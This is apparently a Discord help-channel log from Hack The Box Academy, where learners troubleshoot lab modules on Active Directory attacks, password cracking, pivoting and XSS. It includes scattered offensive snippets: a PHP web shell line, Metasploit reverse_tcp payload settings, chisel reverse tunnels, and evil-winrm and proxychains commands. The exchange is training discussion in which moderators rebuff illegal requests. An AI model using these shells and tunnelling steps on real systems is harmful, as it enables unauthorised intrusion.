Module link: https://academy.hackthebox.com/module/144/section/1311

Hi,

I'm currently working on the AD Enumeration & Attacks - Skills Assessment Part II (Question 4) and running into issues with listing domain usernames.

I reviewed the "Show Solution" hint, which suggests using PowerView.ps1 via an RDP connection. However, when I try to connect using the provided xfreerdp command, I receive an error (screenshot attached).

I've been stuck on this for a couple of days and am unsure how to proceed. I was able to solve the previous question using a WinRM session, but unfortunately, PowerView doesn't seem to function correctly over WinRM in this case.

Any guidance or assistance would be greatly appreciated.

Thank you!

** After trying this Command:** evil-winrm -i dc01.inlanefreight.local -r inlanefreight.local

I Get:
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot find KDC for realm "INLANEFREIGHT.LOCAL"

Error: Exiting with code 1

As far as I know I have to update /etc/krb5.conf but do not know how to know which is the realm I need as the module does not specify.

If you can solve the second question, could you put it as you did? or send me a private message please, since I'm stuck there are: + 0 What are the contents of flag.txt on the administrator's desktop?

Connect to ssh using the option -X

of course

Thank you friend, if I register to solve I also tell you how, I hope you do not forget me, since I have been trying to solve that question for 4 days, and it is impossible for me

It shows how to do that in the Pass the Ticket (PtT) from Linux section

Look again for subdomains, maybe a better wordlist? Maybe a missing option?

Aight I'll try harder

Appreciate the sanity check

Thank you! The connection is working now, but it's extremely slow — it took around 5 minutes just to open Command Prompt.

On another note, I have a question about the password used in the "Show Solution" for performing a password spray. It mentions using the password W....1, but it doesn't explain where that password came from.

Could you please clarify how that password was obtained or where I should have found it?

Thanks again for your help!

I believe it came from the module material, password spraying section if I'm not mistaken

Password Attack module is really great. Not sure how previous version was but for me current version felt amazing

did they remove the part where u need to bruteforce for 45 mins or what

i loved that part

the only section that i have a minor complaint with is the custom rule section; but that's because I feel like there can be a slight addition to show filtering for length
grep -E "^.{N,}" for min length

Thank you I was able to solve the issue it had to do with resolution

On the Password Attacks Assessment, Are we supposed to crack the NTLM hash for the Nexura\Administrator or just get the hash? I think I got it, but it’s not accepting the answer so I’m obviously missing something

Hello, I'm having trouble at this point in the module Cross-Site Scripting (XSS) - Phishing. The site isn't displaying the expected output, even though I've already executed the VPN connection file. Could someone assist me in resolving this?

Nvm got it! Wow that assessment was tricky hahaha

Hey brother I am on the same, the initial machine don't have Python then how you ran lazagne ?

Bro i am not getting anything 🥲 how to proceed further from DMZ01

Please give reasonable hint

hey guys, I'm getting a error on impacket-ntlmrelayx don't want to post the full error here but if someone is willing to give me assistance. Please dm

it have, you have to find correct version of python, btw haven't find any credz with Lazagne

LaZagne also has an .exe

You’re using pwnbox and it’s complaining about the http port 80 being used?

no, im using my own VM, its a error with the pksc20, i believe i can load up my machine and get the full error

Ah okay! What module are you on?

Password Attack pass the certificate

I am stuck too. Not able to get admin_key

he is talking about Linux host.

You can probably post the error here as long as it doesn't contain spoilers.

Yeah

@storm elk hey Check DM I am facing issue in skill assessment - password attacks, i tried 8 hours but not getting anything

Please make sure to ask permissions before DMing #rules

What do you need help with specifically?

Hey I am in evil win RM no rdp open no ssh open, how can I access administrator acc I also have 🔑 password, Pradeep Singh is whenever I want to be administrator it gives me password prompt which is not supported in evil win RM

@strong gale that doesn't sound related to HTB academy, i suggest reading the #rules and #welcome channels to learn what the server is about and learn how you can access more of the server

Hello colleagues, I have a problem running joomla-brute.py /joomla-bruteforce/joomla-brute.py", line 113, in <module>
joomla = Joomla()
^^^^^^^^
File "/joomla-bruteforce/joomla-brute.py", line 22, in init
self.sendrequest()
File "/joomla-bruteforce/joomla-brute.py", line 72, in sendrequest
self.doGET()
File "/joomla-bruteforce/joomla-brute.py", line 75, in doGET
for password in self.getdata(self.wordlistfile):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/joomla-bruteforce/joomla-brute.py", line 107, in getdata
with open(path, 'rb+') as f:
^^^^^^^^^^^^^^^^
I don't know how to interpret these errors. I might think it's due to the version of Python being run, as it's a somewhat older tool. I appreciate your help and comments.

self.x tends to mean that the file is expected to be in the same directory it's running from

Could you explain it to me a little better?

if a python module contains self.whatever (in this case wordlistfile) it's expected (typically) to be in the same directory you're launching from

open(path, 'rb+') opens a file in read only binary mode

but the error falls back on the file not existing to read/open to begin with

Thank you for your appreciation

you can dm

I don't know what issue you're having. You will have to provide specific information on what you need help on.

You can DM me.

Try again.

Guys hello as I understood alpine doesn't support bin/bash

so what's instead?

Try /bin/sh

Hi. I am really stuck in the AI Red Teamer - LLM Output Attacks - Skill Assessment section. Found some sensitive stuff using methods discussed in the module but no use apperently. Any hint you can give me?

Or /bin/ash

hello anybody did Bypassing Wi-Fi Captive Portals skill assessment
I am stuck at the second question i found the admin password and logged in, uploaded the reverse shell and i cannot find the directory to trigger the shell.

Common upload endpoints include:

/upload.php
/profile/upload
/attachments/submit

I also use dirb it found /images but error 301
So no luck here

Hi! Is there anyone I can DM about the NTLM relay module skill assessment? i compromised backup01 and found a readable share but cannot find a way to solve question 3

@raw gulch HTB team recruiting posts belong in #1318239802931286066

Hey

301 isn't an error, it's a redirect

Hi, I have a question about VMs in general. has anyone encountered many false positives when they are trying to brute force with hydra?
If your VM is low on memory, would it impact the accuracy of it?

NEED HELP ! i'm having trouble differentiating between "get-member" and "select-object" as i believe they share a similiar functionality

I think you are referring to AD. Get-Member could mean member of a Group or Domain in general, Object can be any object within AD if im not wrong

yes i was refering to powershell

in general context

i managed to complete the module

i used chatgpt to help me out. the shell was a node.js not a php.
I through trial and error i managed to figure that out.

Now its done.

I really dislike the blind SQLi module. Is '/feedback' the appropriate way give general feedback on modules?

You can use it yes

Why do you dislike it? I loved it

I think i discovered the answer, if your hardware is wonky, it will affect brute force attacks

either that or the memory loaded in the VM is wonky, or if you have an antivirus that scans the memory to delete stuff, it also affects

I feel like it's a really easy module where almost all of the work is actually on python programming rather than getting a deeper understanding of blind sqli and how you would systematically exploit this in a real environment.

I know it's partly because time-based sqli is an absolute pain to do manually. But when a sqli module just starts handing over python code for you to make minor adjustments to, it just feels...wrong

I see! Yeah /feedback is the way to go

You can DM if you are still stuck.

Just a heads up, to ensure that people can help you please provide the module name and the section name. As a lot of us can't see what you are stuck on.

Unfortunately I haven't answered that one so I can't help.

use hashcat. the admin hash is already there

when you use the ||impacket secretdumps||

yeah. check the sample output there on the module. it was just snip on that module. you need to run it to get the full hash

kk

Hey , i need help with android fundamental modul can anyone help me?

https://academy.hackthebox.com/module/115/section/1106

I got stuck in this one

Connect to the target via RDP and establish a reverse shell session with your attack box then submit the hostname of the target box.
this question

I saw a walkthrough and solved it using remmina

how to solve it without using it

I am stuck here
https://academy.hackthebox.com/module/195/section/2182

In this question:
What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()).

Answer of this question is this but , it's saying in correct stringFromJNI()

in the Password Attacks module, can someone give me the user for ssh rdp and smb? i just dont want to wait and wasting my time here. use hydra in VPN and pwnbox but same slow crack because of connection. with note this is just exercise

use xfreerdp

can u name the submodule?

Password Attack - Lab Assessment

Enumerated and Find Credential for smb share of FILE01 & DC01

• got RDP access to JUMP01
  Can anyone tell me what to do further? how to mov further + where i can find password for extracting content from psafefile?

u r supposed to crack the password of psafe file

your question?

Network Services, i appreciate if you can give to save my time

give me a moment guys haha

you are supposed to find save password (firefox) (advice - review module for help)

its ok happens to best of us haha

my advice to you will be use the zip file you are given in module (it wont take long brute forcing using that)

i know i use that just get the ssh, it need around 30 minute because of connection 😦

anyway thanks for advice, i will wait then, nvm seem i found the pattern of username

Please I need help

How do I stop Facebook IP TRACKING

maybe yes

or maybe gitclone latest version

gimme a minute

python3.9 firefox_decrypt.py Using this?

it uses specific version

yea

cant figure out which module you are working on can you provide the link instead?

https://academy.hackthebox.com/module/147/section/1356 Password Attacks

try enumerating the machien for files containing useful info

I found something usefull in the bash history but i couldnt use it for something usefull

then enumerate again you might have missed something

review previous module for techniques

Thank you i will do it again

I found it thank you !!

nice

Why did no mod look at my erratum

Alright, got it 👍

<@&861185840277487616>

Hi, Optional Excercise - Pass the Ticket (Windows)

Quick question: I can do the entire lesson with Mimikatz, but with Rubeus how can I move laterally (PS Remoting) with the base64 hashes? I'd need to use Mimikatz to dump the keys, or with Rubeus is it possible to get the .kirbi files as well? (Optional excercise wants you to not use them together)

After cracking pssafe and retriving Credential, what to do next?

Refrain from posting spoilers, i.e., password.

its not spolier its mentioned in the question

Posting content from modules above Tier 0 is not allowed.

where i should ask if i have a problem ?

Definitely ask here. I suggest reading through pinned content first, as it should have pins that cover suggestions for getting help.

ok thank you i will read it

Hello, I'm doing the Password Attacks Module and in section "Spraying, Stuffing, and Defaults", the challenge is to retrieve the MySQL credentials using a linux user to ssh to the box. Can anybody help with a hint or something?

the default-creds-cheat-sheet is useful here

For Shells & Payloads - The Live Engagement - Host-01
I'm stuck getting a shell. I'm using metasploit, have the right IPs(172.x.x.x) set/ports, but the exploit won't work. I also tried manually by generating the correct file type using msfvenom but I only got 500s.

is your LHOST set properly

yes using 172.x.x.x

and you used the j* venom payload using the .w* output?

yes

i'm assuming you are logged in/using the credentials

yes

hmm i don't recall running into exploit issues

Has anyone done the XSS 2 exercise in Attacking LLM Outputs? I got XSS_1 without issue. But in XXS_2 the cookie I extract there is the whole conversation, not the target cookie. In the first exercise the admin goes to the site automatically, but in this one I'm not sure how to get the admin to look at the testimonials. I tried to feed it an edited version of the conversation cookie (decoded > edited > re-encoded) but no luck. I feel like I'm missing something super obvious. Can anyone offer some advice? Cheers and thanks!

Yeah that's why I'm confused it should be pretty simple exploit

try resetting the target environment and trying again? and make sure no typos with the ip

okay I got it working

So you have to set the target to the correct option then run set PAYLOAD OSGOESHERE/meterpreter/reverse_tcp then execute...for some reason the default target 0 doesn't work even though it's labelled "universal"

Which module should I start with

I’m new and want to really start this

Hello everyone, I'm on moudle "Getting Started" on Service Scanning topic. I use UTM on Mac M1 with Kali Linux installed. I have a task where I need to perform nmap scanning of the target. It asks me the version of the service that is running on port 8080. I connect to vpn by sudo openvpn openvpnfile.ovpn. Then I'm trying this command: ||nmap <target_ip> -p8080 -Pn -sV|| that should scan all services on port 8080 and also give me their version. I get http-proxy service and version column is blank, port shows as filtered. So I guess it's the vpn problem and I decided to ping ip (with vpn connected) and it says that 0 packet (out of 3) were recieved. I don't understand why vpn doesn't work, I have already tried all vpn files on htb (TCP and UDP) and none of them work. What should I do?

i'd start with the information security foundation path under the paths -> skill paths section

I’m doing Coursera cert right now after that start with that one you mention?

Hey I need help in Sherlock's Payload lab

If anyone has solved it can dm me

#sherlocks read and follow #welcome to access it

Coursera has nothing to do with HTB

if you want cert discussions there's #careers-and-certs which you can get access to by following instructions in #welcome

Hi, everyone. I'm currently in the SQL Injection Fundamentals module of the Pentester Role Path. This module seems to focus only on MySQL, with no mention of MSSQL. Is there another module in the role path that teaches more about MSSQL that I might have missed? If not, does this mean we won't encounter it in the CPTS exam?

The techniques described in this module work for both database systems (MySQL & MSSQL)

Alright, thanks

I am a little confused with the "Evaluating the Label Flipping Attack" module in "AI Data Attacks", in the previous module an instance of Jupyter Notebooks was provided in order to complete the exercise, however, in this one I am given a notebook file, but the endpoint that was spawned seems to just be an API endpoit, am I supposed to standup my own instance of jupyter notebooks or am I missing something?

maybe I could load one of the earlier modules and spawn the jupyter notebook environment to complete the assignment... the description of this module seemss to assume there is a jupyter notebook environment, but does not provide any direction on where that environment is, or if I have to stand one up myself

Hi guys, I am trying to rdp a windows vm for windows fundamentals. I am using a kali vm, but I can not connect with xfreerdp3, it says └─$ xfreerdp3 /v:10.129.148.76 /u:htb-student /p:Academy_WinFun! [15:28:10:875] [6622:000019df] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found [15:28:10:875] [6622:000019df] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found [15:28:20:047] [6622:000019df] [ERROR][com.freerdp.crypto] - [freerdp_tls_handshake]: BIO_do_handshake failed [15:28:20:047] [6622:000019df] [ERROR][com.freerdp.core] - [transport_default_connect_tls]: ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
Therefore I use rdesktop, with the command rdesktop -u htb-student -p Academy_WinFun! 10.129.148.76
But I cant click anything on the target windows vm and after a minute the vm is a blackscreen and kali says: This Windows might be busy and is not responding. Do you want to terminate the application?
Does anyone know a fix for it? The kali vm got 8192 ram usage and 6 cpu cores
Somehow, I got it midday. Ofc I am connected to the vpn

Try wrapping the password in single quotes

as for rdesktop, i'm not sure, maybe reinstall the app

mhm, with xfreerdp3 /v:10.129.201.57 /u:htb-student /p:'Academy_WinFun!' I get the same errors as above

Thats weird, I tried it many times with rdektop and sometimes it works sometimes not

But if I am tapping out of the windows target, I can't do anything

I’m learn from here I love this discord so much information thank you

Try /cert:ignore or /sec:rdp, or both

guys do you advice me to only do the modulle Network Foundations or Introduction to Networking and Network Foundations

with /cert:ignore same issues, with both same and with /sec:rdp $ xfreerdp3 /v:10.129.201.57 /u:htb-student /p:'Academy_WinFun!' /sec:rdp [16:14:22:984] [10512:00002911] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x08 -> no RDP scancode found [16:14:22:984] [10512:00002911] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: : keycode: 0x5D -> no RDP scancode found [16:14:23:082] [10512:00002911] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer [16:14:23:082] [10512:00002911] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [16:14:23:218] [10512:00002911] [ERROR][com.freerdp.core.transport] - [transport_read_layer]: BIO_read returned a system error 104: Connection reset by peer [16:14:23:219] [10512:00002911] [ERROR][com.freerdp.core] - [transport_read_layer]: ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [16:14:23:219] [10512:00002911] [ERROR][com.freerdp.core] - [freerdp_connect]: freerdp_post_connect failed
Tomorrow I will be open a prolab, if I can't fix the issue. But I will also try to install parrot os as a vm or as a second boot, since the pwnbox works perfectly.
Anyway thank you

Are you running the pwnbox at the same time as your VPN?

No

Hello,

Could I get an assist on
Advanced Deserialization Attacks - Identifying Vulnerable Functions
NVM

@insane_professor @w1ld__ @zeroknowledgeproof

hi I don't want the answer to this but need a hint. I am on the fourth section of AD Enumeration and Attacks module. There is literally one question. The question is telling me to find a flag in the DNS info. I am using two of the websites mentioned in the section and tried the method mentioned in the section of going on the target site's contact page and plugging the contact into into those sites. I am still not getting the flag. I also tried getting comprehensive DNS info on the target and tried other DNS gathering techniques.

Can someone point me in the right direction?

I think there's something about the phone number of the target website that may be useful but I am unsure.

wait I think I see what the issue is never mind

have to do it from pwnbox not local machine

Yes it will provide with lot's of information which will help you in further understanding of other modules

wait hold on I don't even know if pwnbox is appropriate for this one

I'll get to you guys soon

he the tool it tells me how to use at the end of External Recon and Enumeration Principles section of AD Enumeration and Attacks module isn't working. I tried getting info on two websites mentioned in the section on the target it tells me to try and I still haven't found the flag.

can someone help me one on one?

also its unclear if I need pwnbox for this one or if I can just use my local host

this isn't a hacker4hire server

I know bro

hi is anyone available for DM to help with an active directory enumeration section?

I would get more specific but I don't want to spoil anything

Then why ask about if people can find people out "if you know bro"

Lets not stoke the flames dude.

ok sorry

Yeah sorry.

hi so I'm stuck on the External Recon and Enumeration Principles section of Active Directory Enumeration and Attacks module. I have tried like 20 different things. I used all three of the websites mentioned in the section and played around A LOT with the different search types in them. I looked on the target website and found a suspicious phone number but nothing I lookup with that phone number gets me the results I'm looking for. I tried three different command line tools, one of which is mentioned in the section and that one actually won't install and the other two work but don't get me the flag I'm looking for.

Bgp toolkit was helpful for me @quasi wave

that was one of the tools I used but I will try it again

wait found it

I overlooked thank you

#welcome tells you a lot about the server

Tl;dr: a server about the training services by hackthebox. It has 0 to do with "finding people"

No idea, and generally what you're asking for is illegal. No matter how bad the person is

Wait what i wasnt asking to hack a person 😭 i was just wondering their socials !??

Google is your friend for that ig or linkedin

If you're looking to use their public info to start a harassment campaign, that's considered illegal (even if deserved)

OH NO MOST DEFINITELY NOT!! That IS illegal.

Its to find out just who they are should i not talk to this person or how i feel about them

hi friends!, need help Password Attacks Skills Assessment

I haven't redone the skill assessment yet

Can someone help me with my VM everytime i get done with installing debian it just reboots to the try/install screen and into live mode again

You need to remove the installation media after the install.

@crimson leaf thanks i figured it out i had to change the boot order in the vm settings and put hard disk first

@crimson leaf ngl i was frustrated for a bit lol

If you find out something, will you tell me friend? I will tell you too

Looking for some help with one of the modules - specifically NSE/nmap module. I believe I have found the flag but when submitting, HTB tells me it is incorrect.

According to #welcome I think this is the correct channel to ask. Or should I try in community help?

You might have found a flag for a different question.

yo me too

im stuck on custom password lists section with the mark white exercise if anyone could drop me off at least the custom rules file

Look at the information you are given within the scenario and then look at the different sections that apply to the type of information.

Then revisit that section or your notes.

Help with what?

help Password Attacks Skills Assessment

find out the Betty Jayde user, once inside the Betty Jayde ssh, so try privilege climbing, try searching for credentials, .ccache etc etc ... and nothing without success, I just found a user who starts with hw I don't have sudo permissions, the ip only has ssh open, there is no connection with the other ips can someone help me? I need help

What is the NTLM hash of NEXURA\Administrator?

I also need help but in the Mark white Exercise, my password list got like 1k entries and still it's too small for hashcat

You are going to have to setup some type of pivoting to reach the internal side.

You are doing something wrong, there is no password list that's "too small" for hashcat, even a password list that contains only 1 password will work.

I already intend a lot, to pivot, but I don't know how to approach this friend

maybe it is my custom rules list then since I try to find the hash with John and it never finds it

You can send me a DM.

or maybe the words im applying the rules

Hey in the "Attacking Common Applications " - Attacling WordPress, none of the themes allow me to update the 404 page with system($_GET[0]); web shell. I get an error when clicking update

What gives?

it's not as clear what you're meant to do/rules to apply but there is a link to the hashcat rules stuff i.e. c/C/$<char> to mutate the characters and such

the http one should be correct for that question

as the module is above tier 0; refrain from posting potential spoilers

to be clear it's this section right? @zenith trench ?

https://academy.hackthebox.com/module/19/section/108

Yes that's the section.

Sorry - was trying to provide enough details to explain that I think I got the correct flags

the correct flag should be HTB{87..26}

Yep - that' what I have submitted but get an error that it's incorrect

if you do echo -n "flaghere" | md5sum the flag's hash should be a151bb02ba117f08d3f869c8f8efb90a

Hi! By completing AD Enumeration and Attacks Module, is enough to feel confident to face an insane windows machine?

1; try refreshing the page
2; make sure no extra spaces

you'll probably need a grasp on ADCS stuff to tackle the more insane machines

Alright and Hard windows machines?

probably still need more than the basics of enum and attack

the module difficulty in the path generally reflect machines of the same difficulty

you'll be able to get by mostly, but there's no guarantee as difficulty of boxes is generally more tied to the number of steps alongside the actual difficulty

Did both but still no luck. Tried a new private browsing session too and still says it's incorrect.

no idea what to tell you then ¯_(ツ)_/¯

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

^

@fathom pendant Good to know that, thanks! I haven’t thought about the reflected machines of the module

there were no hashes to crack

there's a Get- command in powershell that is useful here

I know it's 3 days later but you've also fixed my Error detecting the version of libcrypto issue

¯_(ツ)_/¯

it specifically says the cleartext password

it says nothing about cracking any sort of hashes

also it could be a service account, so no direct login enabled

Good to know, thanks.

restart the lab until you get it, the lab is unstable, also deleteing cos contains spoilers

thanks

so smtp service should be running right

correct, it's just a broken lab

/feedback go complain here

When running this snippet of code for this lesson(https://academy.hackthebox.com/module/292/section/3297) Did have trouble downloading the zip file ? I did

I tried manually opening the file , but apparetnly it doesn't exist

I just used wget there

I went directly to the website and it doesn;t seemed to work. I am also running this on my windows machine so I cna't use wget

use it on the file then try password spraying

I'm doing the Password Attacks skill assessment, managed to get inside the DMZ01 box, I can't figure out how to pivot to the other hosts even though I find credentials for another one

I tried proxychains, sshuttle, chisel, and I can get nc to connect to open ports with all three of them but xfreerdp, ssh or nmap always give me weird errors

xfreerdp for example can get the server's certificate but then it can't establish a connection

i have done this but nmap got filtered i don't know how to reach other box

proxychains xfreerdp /u:<redacted> /p:<redacted> /v:x [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 [proxychains] Strict chain ... 127.0.0.1:1080 ... x:3389 ... OK [00:43:42:384] [201623:201625] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0 [00:43:42:385] [201623:201625] [WARN][com.freerdp.crypto] - CN = FILE01.nexura.htb [00:43:43:786] [201623:201625] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success [00:43:43:786] [201623:201625] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [proxychains] Strict chain ... 127.0.0.1:1080 ... x:3389 ... OK [00:43:45:249] [201623:201625] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success [00:43:45:249] [201623:201625] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [00:43:45:249] [201623:201625] [ERROR][com.freerdp.core] - freerdp_post_connect failed

same boat

should I just learn ligolo-ng and come back to this?

I see a lot of people here had the same question as me but I haven't seen an answer that helps me.........

👋 HTB buds

Hi

What's good around here?

Nope, I can't change my server name

This channel is for module discussion. Please read the #rules and follow the instructions in #welcome to gain access to most channels like #general where you can continue this conversation.

i found flag for the nmap modules...but its showing wrong flag

htlb also getting rabbit holes

it's probably for another question then

actually i was seeing a banner for the previuos quesiton

its runs the same vm

when i scanned all the ports it got that

nvm

ohh u r cpts student

i have some quesiton

there is a feature in vm machine of pausing the vm

i was thinking if it would be helpful in the exam

going to rest then pause the vm

and pick it from where i left

@cloud urchin have you ever tried that?

anyone can help me in footprinting module

someone can help me perform the password attack Skills Assessment, what he does was use a chisel sudo./chisel_1.7.7_linux_amd64 server --reverse ---------------------> /tmp/chisel_1.7.7_linux_amd64 client 10.10.15.1:8080 R: shocks 2025/06/22 08:56:40 client: Connection to ws: // 10.10.15.1:8080 2025/06/22 08:56:41 client: Connected (Latency 75.067152ms) now if I can see the internal ips: DMZ01 172.16.119.13 SALTO01 172.16.119.7 FILE01 172.16.119.10 DC01 172.16.119.11 but I don't know what to do anymore, someone can speak to me privately and help me, please

Check for any leading or trailing spaces also dont post flags here

help me out wiht this ques "What other user in the domain has CanPSRemote rights to a host?"

~~in ad module https://academy.hackthebox.com/module/143/section/1275~~

running the query i get only forend as user NVM GOT IT

someone can help me, get with me to solve the password attack module secretly the Skills Assessment

i think its a bug from HTB like i got the flag and it says not correct

Restart the target or swap VPNs and check for spaces as the start and end

Am I right to assume that in essence the powershell helps us communicate with the system and OS resources through .NET------>C#------>Kernel in windows environement?

hey

hey i'm sorry i not speak englis

which language do uou speak

i speak spanish ?jeje

Why server name HackThe box

@dull spruce @edgy valve @hybrid pulsar this server isn't a hacker4hire server; and this isn't a server about performing illegal activities. See the #welcome and #rules channels

Because it's the official server of https://www.hackthebox.com

So what is the benefit of it ?

learning ethical hacking skills that you can use to pursue things like bug bounty, which is legal hacking of services

aaaaaaaa

hacking discord servers is de facto illegal. No matter how you spin it

anyone available for a quick question on Footprinting module, IMAP / POP3 section?

what's the question

lmao

you don't generally have to ask to ask

oh, thought it's not allowed xD

as long as it's not a spoiler for the module it's fine

but you can ask for nudges and such

try resetting the target and trying again

sometimes the targets don't spawn properly

you can also try changing vpn regions

I reset both the target and my whole machine xD

try changing vpn regions :)

I'll try that real quick

also remove the attached image as it's technically a form of spoiler, always redact usernames/passwords

how to become hacker no root work 2gb ram.

I didn't notice that xd

thanks for help btw

problem solved, thank you @fathom pendant ❤️